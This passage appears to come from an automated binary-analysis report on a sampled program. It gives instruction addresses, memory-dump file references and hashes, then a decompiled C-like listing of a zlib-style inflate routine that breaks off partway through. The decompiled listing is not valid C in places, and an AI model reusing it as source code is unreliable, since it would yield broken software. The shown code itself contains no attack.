0x0040bae9
0x0040baec
0x0040baee
0x0040baf1
0x0040baf6
0x0040bb01
0x0040bb0e
0x0040bb12
0x0040bb14
0x0040bb18
0x0040bb1c
0x0040bb25
0x0040bb28
0x0040bb2a
0x0040bb2f
0x0040bb3f
0x0040bb4a
0x0040bb4f
0x0040bb52
0x0040bb56
0x0040bb58
0x0040bb5d
0x0040bb65
0x0040bb70
0x0040bb73
0x0040bb77
0x0040bb89
0x0040bb8c
0x0040bb8e
0x0040bb93
0x0040bb99
0x0040bba6
0x0040bba9
0x0040bbad
0x0040bbaf
0x0040bbb3
0x0040bbc6
0x0040bbc9
0x0040bbcd
0x0040bbcf
0x0040bbd6
0x0040bbdb
0x0040bbe8
0x0040bbea
0x0040bbee
0x0040bbf2
0x0040bbf5
0x0040bc00
0x0040bc03
0x0040bc09
0x0040bc0d
0x0040bc10
0x0040bc18
0x0040bc23
0x0040bc25
0x0040bc29
0x0040bc2d
0x0040bc38
0x0040bc3b
0x0040bc41
0x0040bc48
0x0040bc4c
0x0040bc4f
0x0040bc57
0x0040bc5a
0x0040bc5e
0x0040bc62
0x0040bc68
0x0040bc77
0x0040bc7a
0x0040bc7c
0x0040bc93
0x0040bc97
0x0040bc99
0x0040bc9c
0x0040bca0
0x0040bcaf
0x0040bcb8
0x0040bcba
0x0040bcc5
0x0040bcce
0x0040bcd8
0x0040bcdb
0x0040bcdd
0x0040bce1
0x0040bceb
0x0040bcf7
0x0040bcfa
0x0040bcfc
0x0040bd17
0x0040bd1b
0x0040bd1d
0x0040bd20
0x0040bd26
0x0040bd30
0x0040bd39
0x0040bd3c
0x0040bd3e
0x0040bd59
0x0040bd5d
0x0040bd5f
0x0040bd62
0x0040bd68
0x0040bd72
0x0040bd7b
0x0040bd7e
0x0040bd80
0x0040bd97
0x0040bd99
0x0040bd9d
0x0040bda3
0x0040bda7
0x0040bdaa
0x0040bdb8
0x0040bdbf
0x0040bdc1
0x0040bdd8
0x0040bddc
0x0040bdde
0x0040bde1
0x0040bde7
0x0040bdf1
0x0040bdfc
0x0040bdff
0x0040be01
0x0040be18
0x0040be1c
0x0040be1e
0x0040be21
0x0040be27
0x0040be2f
0x0040be3b
0x0040be3e
0x0040be40
0x0040be57
0x0040be5b
0x0040be5d
0x0040be60
0x0040be66
0x0040be69
0x0040be75
0x0040be78
0x0040be7a
0x0040be9a
0x0040be9e
0x0040bea0
0x0040bea3
0x0040bea9
0x0040beb3
0x0040bebc
0x0040bebf
0x0040bec1
0x0040bedc
0x0040bee0
0x0040bee2
0x0040bee5
0x0040beeb
0x0040bef5
0x0040befe
0x0040bf01
0x0040bf03
0x0040bf16
0x0040bf22
0x0040bf26
0x0040bf31
0x0040bf34
0x0040bf36
0x0040bf3b
0x0040bf3f
0x0040bf42
0x0040bf56
0x0040bf5f
0x0040bf63
0x0040bf6c
0x0040bf6e
0x0040bf72
0x0040bf7e
0x0040bf8b
0x0040bf8d
0x0040bf94
0x0040bf9d
0x0040bfa5
0x0040bfa9
0x0040bfab
0x0040bfb9
0x0040bfbc
0x0040bfbe
0x0040bfc9
0x0040bfcd
0x0040bfe2
0x0040bfe6
0x0040bfe8
0x0040bfec
0x0040bff0
0x0040bff3
0x0040bffe
0x0040c001
0x0040c00b
0x0040c00f
0x0040c014
0x0040c029
0x0040c02d
0x0040c02f
0x0040c033
0x0040c036
0x0040c03a
0x0040c045
0x0040c048
0x0040c052
0x0040c056
0x0040c05d
0x0040c066
0x0040c06c
0x0040c071
0x0040c07b
0x0040c07d
0x0040c083
0x0040c08e
0x0040c091
0x0040c093
0x0040c0a4
0x0040c0aa
0x0040c0af
0x0040c0b9
0x0040c0bb
0x0040c0c1
0x0040c0cd
0x0040c0d0
0x0040c0d2
0x0040c0e5
0x0040c0e8
0x0040c0f0
0x0040c0fa
0x0040c10d
0x0040c114
0x0040c11a
0x0040c12b
0x0040c12e
0x0040c131
0x0040c134
0x0040c136
0x0040c140
0x0040c143
0x0040c14b
0x0040c156
0x0040c15b
0x0040c15f
0x0040c173
0x0040c17d
0x0040c180
0x0040c182
0x0040c189
0x0040c18e
0x0040c19d
0x0040c1a1
0x0040c1a5
0x0040c1ad
0x0040c1b2
0x0040c1b5
0x0040c1b7
0x0040c1bc
0x0040c1c4
0x0040c1c9
0x0040c1d8
0x0040c1dc
0x0040c1e3
0x0040c1e8
0x0040c1eb
0x0040c1ed
0x0040c1f2
0x0040c1fa
0x0040c1ff
0x0040c20e
0x0040c212
0x0040c21a
0x0040c21f
0x0040c222
0x0040c228
0x0040c22c
0x0040c239
0x0040c244
0x0040c248
0x0040c24c
0x0040c250
0x0040c253
0x0040c25d
0x0040c261
0x0040c267
0x0040c270
0x0040c273
0x0040c275
0x0040c283
0x0040c28e
0x0040c292
0x0040c294
0x0040c298
0x0040c29c
0x0040c2a5
0x0040c2a8
0x0040c2aa
0x0040c2b3
0x0040c2be
0x0040c2c2
0x0040c2c4
0x0040c2c8
0x0040c2cc
0x0040c2d5
0x0040c2d8
0x0040c2da
0x0040c2e3
0x0040c2ee
0x0040c2f4
0x0040c2f8
0x0040c303
0x0040c306
0x0040c308
0x0040c30d
0x0040c315
0x0040c326
0x0040c32c
0x0040c32f
0x0040c338
0x0040c33c
0x0040c343
0x0040c346
0x0040c348
0x0040c34f
0x0040c355
0x0040c360
0x0040c364
0x0040c368
0x0040c371
0x0040c373
0x0040c377
0x0040c384
0x0040c387
0x0040c389
0x0040c390
0x0040c39d
0x0040c3a2
0x0040c3a8
0x0040c3ac
0x0040c3ae
0x0040c3b6
0x0040c3ca
0x0040c3d7
0x0040c3db
0x0040c3e6
0x0040c3eb
0x0040c3ed
0x0040c3f3
0x0040c3f6
0x0040c3f9
0x0040c405
0x0040c40a
0x0040c40e
0x0040c41b
0x0040c41e
0x0040c420
0x0040c423
0x0040c427
0x0040c43c
0x0040c447
0x0040c449
0x0040c44f
0x0040c452
0x0040c455
0x0040c45f
0x0040c462
0x0040c464
0x0040c471
0x0040c47a
0x0040c482
0x0040c484
0x0040c48a
0x0040c498
0x0040c49b
0x0040c49d
0x0040c4ac
0x0040c4b1
0x0040c4b9
0x0040c4bb
0x0040c4c1
0x0040c4cf
0x0040c4d2
0x0040c4d4
0x0040c4e3
0x0040c4ec
0x0040c4ee
0x0040c4f2
0x0040c4f8
0x0040c504
0x0040c508
0x0040c50a
0x0040c51f
0x0040c522
0x0040c524
0x0040c52a
0x0040c537
0x0040c53a
0x0040c53c
0x0040c543
0x0040c554
0x0040c556
0x0040c55c
0x0040c567
0x0040c56a
0x0040c56c
0x0040c573
0x0040c58a
0x0040c58e
0x0040c59a
0x0040c59d
0x0040c59f
0x0040c5a4
0x0040c5ac
0x0040c5b7
0x0040c5b9
0x0040c5bc
0x0040c5c0
0x0040c5c3
0x0040c5c6
0x0040c5c8
0x0040c5cb
0x0040c5d5

APIs

memcpy.MSVCRT ref: 0040B2F9

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 34b2f9d877e9efbc64ac028f8f3fe2ac4adc3a0a84f85d592758749353ac592b
Instruction ID: f2dc5ed03a1e2096f90d6f77f129f34a731bb7955bd9b15b58ffdb1364811827
Opcode Fuzzy Hash: 34b2f9d877e9efbc64ac028f8f3fe2ac4adc3a0a84f85d592758749353ac592b
Instruction Fuzzy Hash: 67D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1CA, Relevance: 2.1, Strings: 1, Instructions: 840
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0040F1CA(signed char* __ebx, unsigned int __edx, void** __edi, signed int __esi) {
				signed int _t697;
				signed int _t727;
				intOrPtr _t729;
				signed int _t737;
				void* _t741;
				void* _t742;
				void* _t743;
				void* _t748;
				signed int _t751;
				signed int _t867;
				signed char* _t868;
				void** _t870;
				signed char** _t894;
				signed char** _t901;
				signed int _t1012;
				unsigned int _t1014;
				signed int _t1015;
				signed int _t1016;
				intOrPtr _t1019;
				void* _t1020;
				void** _t1063;
				signed int _t1064;
				signed char** _t1065;
				signed int _t1091;
				int _t1093;
				signed int _t1097;
				intOrPtr _t1099;
				signed int _t1100;
				void* _t1104;

				L0:
				while(1) {
					L0:
					_t1091 = __esi;
					_t1063 = __edi;
					_t1014 = __edx;
					_t868 = __ebx;
					if(__esi >= 0xe) {
						goto L182;
					}
					L178:
					while(1) {
						L179:
						if(__ebp == 0) {
							break;
						}
						L180:
						__eax =  *__ebx & 0x000000ff;
						__eax = ( *__ebx & 0x000000ff) << __cl;
						__ebx = __ebx + 1;
						__edx = __edx + __eax;
						 *(__esp + 0x14) = __ebx;
						__esi = __esi + 8;
						 *(__esp + 0x10) = __edx;
						__ebp = __ebp - 1;
						if(__esi < 0xe) {
							continue;
						} else {
							L181:
							goto L182;
						}
						L360:
					}
					L95:
					_t1064 =  *(_t1104 + 0x10);
					L96:
					_t1019 =  *((intOrPtr*)(_t1104 + 0x4c));
					L97:
					_t901 =  *(_t1104 + 0x48);
					_t870 =  *(_t1104 + 0x20);
					_t901[3] =  *(_t1104 + 0x24);
					_t901[4] =  *(_t1104 + 0x18);
					_t901[1] = _t1097;
					_t1099 =  *((intOrPtr*)(_t1104 + 0x28));
					 *_t901 =  *(_t1104 + 0x14);
					_t870[0xe] = _t1064;
					_t870[0xf] = _t1091;
					if(_t870[0xa] != 0) {
						L102:
						_t727 = E004101E0(_t901, _t901[3], _t1099 - _t901[4]);
						_t1104 = _t1104 + 0xc;
						if(_t727 == 0) {
							L343:
							_t901 =  *(_t1104 + 0x48);
							goto L344;
						} else {
							L103:
							 *_t870 = 0x1e;
							L104:
							_t737 = 0xfffffffc;
							goto L105;
						}
					} else {
						L98:
						if(_t1099 == _t901[4]) {
							L344:
							_t729 =  *((intOrPtr*)(_t1104 + 0x3c)) - _t901[1];
							_t1100 = _t1099 - _t901[4];
							_t901[2] =  &(_t901[2][_t729]);
							_t901[5] =  &(_t901[5][_t1100]);
							_t870[7] = _t870[7] + _t1100;
							 *((intOrPtr*)(_t1104 + 0x3c)) = _t729;
							if(_t870[2] == 0) {
								L349:
								_t1065 =  *(_t1104 + 0x48);
							} else {
								L345:
								if(_t1100 == 0) {
									goto L349;
								} else {
									L346:
									_push(_t1100);
									_push(_t901[3] - _t1100);
									_push(_t870[6]);
									if(_t870[4] == 0) {
										_t741 = E00410AD0();
										_t1065 =  *(_t1104 + 0x54);
										_t1104 = _t1104 + 0xc;
										_t870[6] = _t741;
										_t1065[0xc] = _t741;
									} else {
										_t742 = E004102D0();
										_t1065 =  *(_t1104 + 0x54);
										_t1104 = _t1104 + 0xc;
										_t870[6] = _t742;
										_t1065[0xc] = _t742;
									}
								}
							}
							L350:
							_t1020 =  *_t870;
							if(_t1020 == 0x13) {
								L353:
								_t1093 = 0x100;
							} else {
								L351:
								if(_t1020 == 0xe) {
									goto L353;
								} else {
									L352:
									_t1093 = 0;
								}
							}
							L354:
							asm("sbb ecx, ecx");
							_t1020 - 0xb =  *((intOrPtr*)(_t1104 + 0x3c));
							_t1065[0xb] = ((0 | _t1020 != 0x0000000b) - 0x00000001 & 0x00000080) + ( ~(_t870[1]) & 0x00000040) + _t1093 + _t870[0xf];
							if( *((intOrPtr*)(_t1104 + 0x3c)) != 0) {
								L356:
								if( *((intOrPtr*)(_t1104 + 0x4c)) != 4) {
									L359:
									return  *(_t1104 + 0x2c);
								} else {
									goto L357;
								}
							} else {
								L355:
								if(_t1100 == 0) {
									L357:
									_t737 =  *(_t1104 + 0x2c);
									if(_t737 != 0) {
										L105:
										return _t737;
									} else {
										L358:
										return 0xfffffffb;
									}
								} else {
									goto L356;
								}
							}
						} else {
							L99:
							_t743 =  *_t870;
							if(_t743 >= 0x1d) {
								goto L344;
							} else {
								L100:
								if(_t743 < 0x1a) {
									goto L102;
								} else {
									L101:
									if(_t1019 == 4) {
										goto L344;
									} else {
										goto L102;
									}
								}
							}
						}
					}
					goto L360;
					L182:
					_t1091 = _t1091 - 0xe;
					_t1015 = _t1014 >> 5;
					_t1063[0x18] = (_t1014 & 0x0000001f) + 0x101;
					_t1016 = _t1015 >> 5;
					_t1063[0x19] = 1 + (_t1015 & 0x0000001f);
					_t1014 = _t1016 >> 4;
					 *(_t1104 + 0x10) = _t1014;
					_t1063[0x17] = (_t1016 & 0x0000000f) + 4;
					if(_t1063[0x18] > 0x11e) {
						L195:
						_t894[6] = "too many length or distance symbols";
						 *_t1063 = 0x1d;
						goto L175;
					} else {
						L183:
						if(_t1063[0x19] > 0x1e) {
							goto L195;
						} else {
							L184:
							_t1063[0x1a] = 0;
							 *_t1063 = 0x11;
							L185:
							if(_t1063[0x1a] >= _t1063[0x17]) {
								L191:
								while(_t1063[0x1a] < 0x13) {
									L192:
									 *(_t1063 + 0x70 + ( *(0x412fb8 + _t1063[0x1a] * 2) & 0x0000ffff) * 2) = 0;
									_t1063[0x1a] = 1 + _t1063[0x1a];
								}
								L193:
								_t748 =  &(_t1063[0x14c]);
								_t1063[0x15] = 7;
								_t1063[0x13] = _t748;
								_t1063[0x1b] = _t748;
								_t751 = E00410DF0(0,  &(_t1063[0x1c]), 0x13,  &(_t1063[0x1b]),  &(_t1063[0x15]),  &(_t1063[0xbc]));
								_t1104 = _t1104 + 0x18;
								 *(_t1104 + 0x2c) = _t751;
								if(_t751 == 0) {
									L196:
									_t1063[0x1a] = 0;
									 *_t1063 = 0x12;
									goto L197;
								} else {
									L194:
									_t894 =  *(_t1104 + 0x48);
									_t1014 =  *(_t1104 + 0x10);
									_t894[6] = "invalid code lengths set";
									 *_t1063 = 0x1d;
									while(1) {
										L175:
										_t697 =  *_t1063;
										if(_t697 > 0x1e) {
											break;
										}
										L1:
										switch( *((intOrPtr*)(_t697 * 4 +  &M0040FE40))) {
											case 0:
												L2:
												_t707 = _t1063[2];
												if(_t707 != 0) {
													L4:
													__eflags = _t1091 - 0x10;
													if(_t1091 >= 0x10) {
														L9:
														__eflags = _t707 & 0x00000002;
														if((_t707 & 0x00000002) == 0) {
															L12:
															_t708 = _t1063[8];
															_t1063[4] = 0;
															__eflags = _t708;
															if(_t708 != 0) {
																 *(_t708 + 0x30) = 0xffffffff;
															}
															L14:
															__eflags = _t1063[2] & 0x00000001;
															if((_t1063[2] & 0x00000001) == 0) {
																L24:
																_t894[6] = "incorrect header check";
																 *_t1063 = 0x1d;
															} else {
																L15:
																_t711 = (_t1014 >> 8) + ((_t1014 & 0x000000ff) << 8);
																__eflags = _t711 % 0x1f;
																_t1014 =  *(_t1104 + 0x10);
																if(_t711 % 0x1f != 0) {
																	_t894 =  *(_t1104 + 0x48);
																	goto L24;
																} else {
																	L16:
																	__eflags = (_t1014 & 0x0000000f) - 8;
																	if((_t1014 & 0x0000000f) == 8) {
																		L18:
																		_t715 = _t1063[9];
																		_t1091 = _t1091 - 4;
																		_t1014 = _t1014 >> 4;
																		 *(_t1104 + 0x10) = _t1014;
																		_t900 = (_t1014 & 0x0000000f) + 8;
																		__eflags = _t715;
																		if(_t715 != 0) {
																			L21:
																			__eflags = _t900 - _t715;
																			if(_t900 <= _t715) {
																				goto L20;
																			} else {
																				_t894 =  *(_t1104 + 0x48);
																				_t894[6] = "invalid window size";
																				 *_t1063 = 0x1d;
																			}
																		} else {
																			_t1063[9] = _t900;
																			L20:
																			_push(0);
																			_push(0);
																			_push(0);
																			_t1063[5] = 1 << _t900;
																			_t718 = E00410AD0();
																			_t1021 =  *(_t1104 + 0x1c);
																			_t1104 = _t1104 + 0xc;
																			_t894 =  *(_t1104 + 0x48);
																			_t1063[6] = _t718;
																			_t894[0xc] = _t718;
																			 *_t1063 =  !(_t1021 >> 8) & 0x00000002 | 0x00000009;
																			_t1014 = 0;
																			 *(_t1104 + 0x10) = 0;
																			_t1091 = 0;
																		}
																	} else {
																		_t894 =  *(_t1104 + 0x48);
																		_t894[6] = "unknown compression method";
																		 *_t1063 = 0x1d;
																	}
																}
															}
														} else {
															L10:
															__eflags = _t1014 - 0x8b1f;
															if(_t1014 != 0x8b1f) {
																goto L12;
															} else {
																_push(0);
																_push(0);
																_push(0);
																_t1063[6] = E004102D0();
																_push(2);
																_push(_t1104 + 0x28);
																 *(_t1104 + 0x30) = 0x8b1f;
																_push(_t1063[6]);
																_t721 = E004102D0();
																_t1014 = 0;
																_t1063[6] = _t721;
																_t1104 = _t1104 + 0x18;
																 *(_t1104 + 0x10) = 0;
																_t1091 = 0;
																 *_t1063 = 1;
																goto L174;
															}
														}
														goto L175;
													} else {
														while(1) {
															L6:
															__eflags = _t1097;
															if(_t1097 == 0) {
																goto L95;
															}
															L7:
															_t745 = ( *_t868 & 0x000000ff) << _t1091;
															_t868 =  &(_t868[1]);
															_t1014 = _t1014 + _t745;
															 *(_t1104 + 0x14) = _t868;
															_t1091 = _t1091 + 8;
															 *(_t1104 + 0x10) = _t1014;
															_t1097 = _t1097 - 1;
															__eflags = _t1091 - 0x10;
															if(_t1091 < 0x10) {
																continue;
															} else {
																_t707 = _t1063[2];
																_t894 =  *(_t1104 + 0x48);
																goto L9;
															}
															goto L360;
														}
														goto L95;
													}
												} else {
													 *_t1063 = 0xc;
													goto L175;
												}
												goto L360;
											case 1:
												L25:
												__eflags = __esi - 0x10;
												if(__esi >= 0x10) {
													L29:
													__edi[4] = __edx;
													__eflags = __dl - 8;
													if(__dl == 8) {
														L31:
														__eflags = __edx & 0x0000e000;
														if((__edx & 0x0000e000) == 0) {
															L33:
															__ecx = __edi[8];
															__eflags = __ecx;
															if(__ecx != 0) {
																__edx = __edx >> 8;
																__eax = __edx >> 0x00000008 & 0x00000001;
																__eflags = __eax;
																 *__ecx = __eax;
															}
															__eflags = __edi[4] & 0x00000200;
															if((__edi[4] & 0x00000200) != 0) {
																 *(__esp + 0x1c) = __dl;
																__eax = __esp + 0x1c;
																_push(2);
																__eflags = __edx;
																_push(__eax);
																 *(__esp + 0x25) = __dl;
																_push(__edi[6]);
																__eax = E004102D0();
																__esp = __esp + 0xc;
																__edi[6] = __eax;
															}
															__edx = 0;
															 *__edi = 2;
															 *(__esp + 0x10) = 0;
															__esi = 0;
															goto L40;
														} else {
															L32:
															 *(0x18 + __ecx) = "unknown header flags set";
															 *__edi = 0x1d;
															goto L175;
														}
													} else {
														L30:
														 *(0x18 + __ecx) = "unknown compression method";
														 *__edi = 0x1d;
														goto L175;
													}
												} else {
													while(1) {
														L26:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L27:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x10;
														if(__esi < 0x10) {
															continue;
														} else {
															__ecx =  *(__esp + 0x48);
															goto L29;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 2:
												L38:
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L42:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 4) = __edx;
													}
													__eflags = __edi[4] & 0x00000200;
													if((__edi[4] & 0x00000200) != 0) {
														__eax = __edx;
														 *(__esp + 0x1c) = __dl;
														__eax = __edx >> 8;
														 *(__esp + 0x1d) = __al;
														__edx = __edx >> 0x10;
														 *(__esp + 0x1e) = __al;
														__eax = __esp + 0x1c;
														_push(4);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x27) = __dl;
														_push(__edi[6]);
														__eax = E004102D0();
														__esp = __esp + 0xc;
														__edi[6] = __eax;
													}
													__edx = 0;
													 *__edi = 3;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													goto L49;
												} else {
													L39:
													while(1) {
														L40:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L41:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L42;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 3:
												L47:
												__eflags = __esi - 0x10;
												if(__esi >= 0x10) {
													L51:
													__ecx = __edi[8];
													__eflags = __ecx;
													if(__ecx != 0) {
														__eax = __dl & 0x000000ff;
														 *(__ecx + 8) = __dl & 0x000000ff;
														__ecx = __edx;
														__eax = __edi[8];
														__ecx = __edx >> 8;
														__eflags = __ecx;
														 *(0xc + __edi[8]) = __ecx;
													}
													__eflags = __edi[4] & 0x00000200;
													if((__edi[4] & 0x00000200) != 0) {
														 *(__esp + 0x1c) = __dl;
														__eax = __esp + 0x1c;
														_push(2);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x25) = __dl;
														_push(__edi[6]);
														__eax = E004102D0();
														__esp = __esp + 0xc;
														__edi[6] = __eax;
													}
													__edx = 0;
													 *__edi = 4;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													__eflags = 0;
													goto L56;
												} else {
													L48:
													while(1) {
														L49:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L50:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x10;
														if(__esi < 0x10) {
															continue;
														} else {
															goto L51;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 4:
												L56:
												__eflags = __edi[4] & 0x00000400;
												if((__edi[4] & 0x00000400) == 0) {
													L65:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x10) = 0;
													}
													goto L67;
												} else {
													L57:
													__eflags = __esi - 0x10;
													if(__esi >= 0x10) {
														L60:
														__eax = __edi[8];
														__edi[0x10] = __edx;
														__eflags = __eax;
														if(__eax != 0) {
															 *(__eax + 0x14) = __edx;
														}
														__eflags = __edi[4] & 0x00000200;
														if((__edi[4] & 0x00000200) != 0) {
															 *(__esp + 0x1c) = __dl;
															__eax = __esp + 0x1c;
															_push(2);
															__eflags = __edx;
															_push(__eax);
															 *(__esp + 0x25) = __dl;
															_push(__edi[6]);
															__eax = E004102D0();
															__esp = __esp + 0xc;
															__edi[6] = __eax;
														}
														__ecx = 0;
														__esi = 0;
														 *(__esp + 0x10) = 0;
														L67:
														 *__edi = 5;
														goto L68;
													} else {
														while(1) {
															L58:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L95;
															}
															L59:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 0x10;
															if(__esi < 0x10) {
																continue;
															} else {
																goto L60;
															}
															goto L360;
														}
														goto L95;
													}
												}
												goto L360;
											case 5:
												L68:
												__eflags = __edi[4] & 0x00000400;
												if((__edi[4] & 0x00000400) == 0) {
													L82:
													__edi[0x10] = 0;
													 *__edi = 6;
													goto L83;
												} else {
													L69:
													__ecx = __edi[0x10];
													 *(__esp + 0x34) = __ecx;
													__eflags = __ecx - __ebp;
													if(__ecx > __ebp) {
														__ecx = __ebp;
														 *(__esp + 0x34) = __ebp;
													}
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx = __edi[8];
														__eflags = __edx;
														if(__edx != 0) {
															__eax =  *(__edx + 0x10);
															 *(__esp + 0x30) = __eax;
															__eflags = __eax;
															if(__eax != 0) {
																__eax =  *(__edx + 0x14);
																__eax =  *(__edx + 0x14) - __edi[0x10];
																__edx =  *(0x18 + __edx);
																 *(__esp + 0x38) = __eax;
																__eflags = __eax - __edx;
																__eax =  *(__esp + 0x38);
																if(__eflags <= 0) {
																	__edx = __ecx;
																} else {
																	__edx = __edx - __eax;
																}
																__eax = __eax +  *(__esp + 0x30);
																__eflags = __eax;
																__eax = memcpy(__eax, __ebx, __edx);
																__ecx =  *(__esp + 0x40);
																__esp = __esp + 0xc;
															}
														}
														__eflags = __edi[4] & 0x00000200;
														if((__edi[4] & 0x00000200) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push(__edi[6]);
															__eax = E004102D0();
															__esp = __esp + 0xc;
															__edi[6] = __eax;
														}
														__eax =  *(__esp + 0x34);
														__ebx = __ebx + __eax;
														__ebp = __ebp - __eax;
														 *(__esp + 0x14) = __ebx;
														_t132 =  &(__edi[0x10]);
														 *_t132 = __edi[0x10] - __eax;
														__eflags =  *_t132;
													}
													__eflags = __edi[0x10];
													if(__edi[0x10] != 0) {
														goto L95;
													} else {
														goto L82;
													}
												}
												goto L360;
											case 6:
												L83:
												__eflags = __edi[4] & 0x00000800;
												if((__edi[4] & 0x00000800) == 0) {
													L106:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x1c) = 0;
													}
													goto L108;
												} else {
													L84:
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L95;
													} else {
														L85:
														__ecx = 0;
														__eflags = 0;
														while(1) {
															L86:
															__eax =  *(__ebx + __ecx) & 0x000000ff;
															__ecx = 1 + __ecx;
															 *(__esp + 0x34) = __eax;
															__eax = __edi[8];
															__eflags = __eax;
															if(__eax != 0) {
																__edx =  *(__eax + 0x1c);
																__eflags =  *(__eax + 0x1c);
																if( *(__eax + 0x1c) != 0) {
																	__edx = __edi[0x10];
																	__eflags = __edx -  *((intOrPtr*)(__eax + 0x20));
																	if(__edx <  *((intOrPtr*)(__eax + 0x20))) {
																		__eax =  *(__eax + 0x1c);
																		__ebx =  *(__esp + 0x34);
																		 *(__eax + __edx) = __bl;
																		_t148 =  &(__edi[0x10]);
																		 *_t148 = 1 + __edi[0x10];
																		__eflags =  *_t148;
																		__ebx =  *(__esp + 0x14);
																	}
																}
															}
															__eax =  *(__esp + 0x34);
															__eflags = __eax;
															if(__eax == 0) {
																break;
															}
															L91:
															__eflags = __ecx - __ebp;
															if(__ecx < __ebp) {
																continue;
															}
															break;
														}
														L92:
														__eflags = __edi[4] & 0x00000200;
														 *(__esp + 0x38) = __ecx;
														if((__edi[4] & 0x00000200) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push(__edi[6]);
															__eax = E004102D0();
															__ecx =  *(__esp + 0x44);
															__esp = __esp + 0xc;
															__edi[6] = __eax;
															__eax =  *(__esp + 0x34);
														}
														__ebx = __ebx + __ecx;
														__ebp = __ebp - __ecx;
														 *(__esp + 0x14) = __ebx;
														__eflags = __eax;
														if(__eax == 0) {
															L108:
															__edi[0x10] = 0;
															 *__edi = 7;
															goto L109;
														} else {
															goto L95;
														}
													}
												}
												goto L360;
											case 7:
												L109:
												__eflags = __edi[4] & 0x00001000;
												if((__edi[4] & 0x00001000) == 0) {
													L122:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x24) = 0;
													}
													goto L124;
												} else {
													L110:
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L95;
													} else {
														L111:
														__ecx = 0;
														__eflags = 0;
														while(1) {
															L112:
															__eax =  *(__ebx + __ecx) & 0x000000ff;
															__ecx = 1 + __ecx;
															 *(__esp + 0x34) = __eax;
															__eax = __edi[8];
															__eflags = __eax;
															if(__eax != 0) {
																__edx =  *(__eax + 0x24);
																__eflags =  *(__eax + 0x24);
																if( *(__eax + 0x24) != 0) {
																	__edx = __edi[0x10];
																	__eflags = __edx -  *((intOrPtr*)(__eax + 0x28));
																	if(__edx <  *((intOrPtr*)(__eax + 0x28))) {
																		__eax =  *(__eax + 0x24);
																		__ebx =  *(__esp + 0x34);
																		 *(__eax + __edx) = __bl;
																		_t193 =  &(__edi[0x10]);
																		 *_t193 = 1 + __edi[0x10];
																		__eflags =  *_t193;
																		__ebx =  *(__esp + 0x14);
																	}
																}
															}
															__eax =  *(__esp + 0x34);
															__eflags = __eax;
															if(__eax == 0) {
																break;
															}
															L117:
															__eflags = __ecx - __ebp;
															if(__ecx < __ebp) {
																continue;
															}
															break;
														}
														L118:
														__eflags = __edi[4] & 0x00000200;
														 *(__esp + 0x38) = __ecx;
														if((__edi[4] & 0x00000200) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push(__edi[6]);
															__eax = E004102D0();
															__ecx =  *(__esp + 0x44);
															__esp = __esp + 0xc;
															__edi[6] = __eax;
															__eax =  *(__esp + 0x34);
														}
														__ebx = __ebx + __ecx;
														__ebp = __ebp - __ecx;
														 *(__esp + 0x14) = __ebx;
														__eflags = __eax;
														if(__eax != 0) {
															goto L95;
														} else {
															L121:
															L124:
															__edx =  *(__esp + 0x10);
															 *__edi = 8;
															goto L125;
														}
													}
												}
												goto L360;
											case 8:
												L125:
												__eflags = __edi[4] & 0x00000200;
